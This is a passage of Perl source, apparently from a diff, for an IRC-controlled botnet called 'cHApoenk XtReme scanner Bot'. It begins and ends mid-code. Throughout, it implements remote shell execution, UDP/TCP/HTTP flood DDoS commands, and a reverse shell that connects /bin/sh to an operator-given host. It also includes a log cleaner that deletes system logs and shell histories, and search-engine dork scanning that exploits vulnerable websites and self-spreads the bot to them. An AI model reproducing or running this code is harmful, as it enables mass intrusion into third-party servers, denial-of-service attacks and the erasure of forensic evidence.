if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) { + if ($onde eq "$meunick"){ + shell("$pn", "$args"); + } + +#End of Connect + +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# PREFIX # +# # +###################### +# You can change the prefix if you want but the commands will be different +# The standard prefix is !bgr if you change it into !bitch for example +# every command will be like !bitch @udpflood, !bitch @googlescan. +# So its recommended not to change this ;) +###################### + + if ($args =~ /^(\Q$meunick\E|\!hack)\s+(.*)/ ) { + my $natrix = $1; + my $arg = $2; + if ($arg =~ /^\!(.*)/) { + ircase("$pn","$onde","$1") unless ($natrix eq "!hack" and $arg =~ /^\!nick/); + } elsif ($arg =~ /^\@(.*)/) { + $ondep = $onde; + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + } else { + shell("$onde", "$arg"); + } + } +} +} +###################### +# End of PREFIX # +# # +###################### + +elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { +if (lc($1) eq lc($meunick)) { + $meunick=$4; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; +} +} elsif ($servarg =~ m/^\:(.+?)\s+433/i) { +nick("$meunick".int rand(999999)); +} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { +$meunick = $2; +$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; +$irc_servers{$IRC_cur_socket}{'nome'} = "$1"; +foreach my $canal (@canais) { + sendraw("JOIN $canal ddosit"); +} +} +} + +sub bfunc { +my $printl = $_[0]; +my $funcarg = $_[1]; +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { + exit; +} else { + +###################### +# Help # +# # +###################### + +if ($funcarg =~ /^help/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) Select the function you want help for"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@ddos"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@scanscan"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@backconnect"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@shell"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@portscanner"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) Or if you want too know all the commands type:"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@commands"); + +} + +if ($funcarg =~ /^ddos/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) There are 3 DDossers in this bot"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) UDPFlood, HTTPFlood and TCPFlood"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@udpflood <ip> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@tcpflood <ip> <port> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@httpflood <site> <time>"); + +} + +if ($funcarg =~ /^scan/) { + #sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) This bot also contains a scan scanner."); + +} + +if ($funcarg =~ /^backconnect/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) You use backconnect like this :"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@back <ip><port>"); +} + +if ($funcarg =~ /^shell/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) This bot has a integrated shell"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) You can use it in private but also public in the channel"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) In public channel just use : 7!bgr cd tmp12 for example"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) For help with the linux commands type :!hack 7@linuxhelp"); +} + +if ($funcarg =~ /^port/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) There is a normal portscan and a Nmap:"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@portscan <ip>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@nmap <ip> <beginport> <endport>"); +} + +if ($funcarg =~ /^commands/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) You can use the following commands :"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@portscan <ip>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@nmap <ip> <beginport> <endport>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@back <ip><port>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack cd tmp 12 for example"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@udpflood <ip> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@tcpflood <ip> <port> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@httpflood <site> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@linuxhelp"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@spread <scan>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@scan <vuln> <dork>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@system"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@logcleaner"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@sendmail <subject> <sender> <recipient> <message>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@milw0rm"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@join #channel"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !hack 7@part #channel"); +} + +if ($funcarg =~ /^linuxhelp/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Dir where you are : pwd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Start a Perl file : perl file.pl"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Go back from dir : cd .."); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Force to Remove a file/dir : rm -rf file/dir;ls -la"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Show all files/dir with permissions : ls -lia"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find config.inc.php files : find / -type f -name config.inc.php"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find all writable folders and files : find / -perm -2 -ls"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find all .htpasswd files : find / -type f -name .htpasswd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find all service.pwd files : find / -type f -name service.pwd"); +} + +###################### +# End of Help # +# # +###################### +if ($funcarg =~ /^spread\s+(.*)/) { +$vuln = $1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Spread Mode4+) Spreading bot on :14 $vuln"); +my $shellurl="http://".$vuln.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$shellurl); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Spread Mode4+) Bot is Spreaded on :14 $vuln"); +} +###################### +# Commands # +# # +###################### + +if ($funcarg =~ /^system/) { +$uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`; + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Info BOT : Server : 14Cannot View :14 1337"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Uname -a : 7 $uname"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Uptime : 7 $uptime"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Own Prosses : 7 $processo"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) ID : 7 $id"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Own Dir : 7 $ownd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) OS : 7 $distro"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Owner : 7 linux"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Channel : 7 #indohackerlink"); +} + +if ($funcarg =~ /^bug/) { + my @ltt=(); + my @bug=(); + my $x; + my $page=""; + my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return; + print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; + my @r = <$socke>; + $page="@r"; + close($socke); + while ($page =~ m/<title>(.*)</g){ + $x = $1; + if ($x =~ /\<\;/) { + $x =~ s/\<\;/</g; + } + if ($x !~ /milw0rm/) { + push (@bug,$x); + }} + while ($page =~ m/<link.*expl.*([0-9]...)</g) { + if ($1 !~ m/milw0rm.com|exploits|en/){ + push (@ltt,"http://www.milw0rm.com/exploits/$1 "); + }} + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Milw0rm Hack4+) Latest exploits :"); + foreach $x (0..(@ltt - 1)) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Milw0rm Hack4+)14 $bug[$x] -3 $ltt[$x]"); + sleep 1; +}} +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# Portscan # +# # +###################### + +if ($funcarg =~ /^port (.*)/) { + my $hostip="$1"; + my + @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555"); + my (@aberta, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Portscan4+) scanning for open ports on  4".$1." started ."); + foreach my $porta (@portas) { + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => + 'tcp', Timeout => 4); + if ($scansock) { + push (@aberta, $porta); + $scansock->close; + } + } + + if (@aberta) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Portscan4+) Open ports founded:5 @aberta"); + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Portscan4+) No open ports foundend."); + } +} + +###################### +# End of Portscan # +# # +###################### +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# Nmap # +# # +###################### + if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){ + my $hostip="$1"; + my $portstart = "$2"; + my $portend = "$3"; + my (@abertas, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) :4 $1 (4+Port4+) 4 $2-$3"); + foreach my $porta ($portstart..$portend){ + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime); + if ($scansock) { + push (@abertas, $porta); + $scansock->close; + if ($xstats){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) Founded 4 $porta"."/Open"); + } + } + } + if (@abertas) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) Complete "); + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) No open ports have been founded 13"); + } + } +###################### +# End of Nmap # +# # +###################### +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# Log Cleaner # +# # +###################### +if ($funcarg =~ /^logcleaner/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) This process can be long, just wait"); + system 'rm -rf /var/log/lastlog'; + system 'rm -rf /var/log/wtmp'; + system 'rm -rf /etc/wtmp'; + system 'rm -rf /var/run/utmp'; + system 'rm -rf /etc/utmp'; + system 'rm -rf /var/log'; + system 'rm -rf /var/logs'; + system 'rm -rf /var/adm'; + system 'rm -rf /var/apache/log'; + system 'rm -rf /var/apache/logs'; + system 'rm -rf /usr/local/apache/log'; + system 'rm -rf /usr/local/apache/logs'; + system 'rm -rf /root/.bash_history'; + system 'rm -rf /root/.ksh_history'; +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) All default log and bash_history files erased"); + sleep 1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) Now Erasing the rest of the machine log files"); + system 'find / -name *.bash_history -exec rm -rf {} \;'; + system 'find / -name *.bash_logout -exec rm -rf {} \;'; + system 'find / -name "log*" -exec rm -rf {} \;'; + system 'find / -name *.log -exec rm -rf {} \;'; + sleep 1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) Done! All logs erased"); + } +###################### +# End of Log Cleaner # +# # +###################### +# +# cHApoenk XtReme scanner Bot +# +###################### +# MAILER # +# # +###################### +# For mailing use : +# !bgr @sendmail <subject> <sender> <recipient> <message> +# +###################### +if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Mailer4+) Sending Mail to :10 $3"); +$subject = $1; +$sender = $2; +$recipient = $3; +@corpo = $4; +$mailtype = "content-type: text/html"; +$sendmail = '/usr/sbin/sendmail'; +open (SENDMAIL, "| $sendmail -t"); +print SENDMAIL "$mailtype\n"; +print SENDMAIL "Subject: $subject\n"; +print SENDMAIL "From: $sender\n"; +print SENDMAIL "To: $recipient\n\n"; +print SENDMAIL "@corpo\n\n"; +close (SENDMAIL); +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Mailer4+) Mail Sended To :10 $recipient"); +} +###################### +# End of MAILER # +# # +###################### +###################### +# Join And Part # +# # +###################### + if ($funcarg =~ /^join (.*)/) { + sendraw($IRC_cur_socket, "JOIN ".$1); + } + if ($funcarg =~ /^part (.*)/) { + sendraw($IRC_cur_socket, "PART ".$1); + } + +###################### +#End of Join And Part# +# # +###################### +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# TCPFlood # +# # +###################### + +if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+TCPKill4+) Attacking 4 ".$1.":".$2." for 4 ".$3." seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($3>$cur_time){ + $cur_time = time - $itime; + &tcpflooder("$1","$2","$3"); +} +sendraw($IRC_cur_socket,"PRIVMSG $printl :(4+TCPKill4+) Attack done 4 ".$1.":".$2."."); +} +###################### +# End of TCPFlood # +# # +###################### +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# Back Connect # +# # +###################### +if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) { +my $host = "$1"; +my $porta = "$2"; +my $proto = getprotobyname('tcp'); +my $iaddr = inet_aton($host); +my $paddr = sockaddr_in($porta, $iaddr); +my $shell = "/bin/sh -i"; +if ($^O eq "MSWin32") { + $shell = "cmd.exe"; +} +socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; +connect(SOCKET, $paddr) or die "connect: $!"; +open(STDIN, ">&SOCKET"); +open(STDOUT, ">&SOCKET"); +open(STDERR, ">&SOCKET"); +system("$shell"); +close(STDIN); +close(STDOUT); +close(STDERR); +if ($estatisticas) +{ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+BackConnect4+) Connecting to 4 $host:$porta"); +} +} +###################### +#End of Back Connect# +# # +###################### +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# EXTREME scanNER # +# # +###################### +###################################################################### +#################### GOOGLE +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +### Start Message + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Initializing4+) Backdoor scan is for12 $bug and12 $dork"); +### End of Start Message +# Starting The Search Engine + my @google=&googlet($dork); +# +push(my @tot, @google); +# +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Google4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Google4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /Mic22/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4 dapet boss(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /Mic22/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :3busuk..sem -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### AllTheWeb +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @alltheweb=&allthewebt($dork); + my @allweb=&standard($dork); +# +push(my @tot, @alltheweb, @allweb); +# +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+AllWeb4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+AllWeb4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /Mic22/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /Mic22/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### LYCOS +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @lylist=&lycos($dork); +push(my @lybyp,@lylist); +# +push(my @tot, @lybyp); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Lycos4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Lycos4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /Mic22/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /Mic22/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### Yahoo +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @ylist=&yahoo($dork); + my @yalist=&yahooa($dork); + my @yblist=&yahoob($dork); + my @yclist=&yahooc($dork); + my @ydlist=&yahood($dork); + push(my @yahoobypass, @ylist, @yalist, @yblist, @yclist, @ydlist ); +# +push(my @tot, @yahoobypass); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Yahoo4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Yahoo4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /Mic22/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /Mic22/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### MSN +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @mlist=&msn($dork); +push(my @tot, @mlist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MSN4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MSN4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /Mic22/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /Mic22/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### SEARCH +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @slist=&search($dork); +push(my @tot, @slist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Search4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Search4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /Mic22/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG billgate :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); 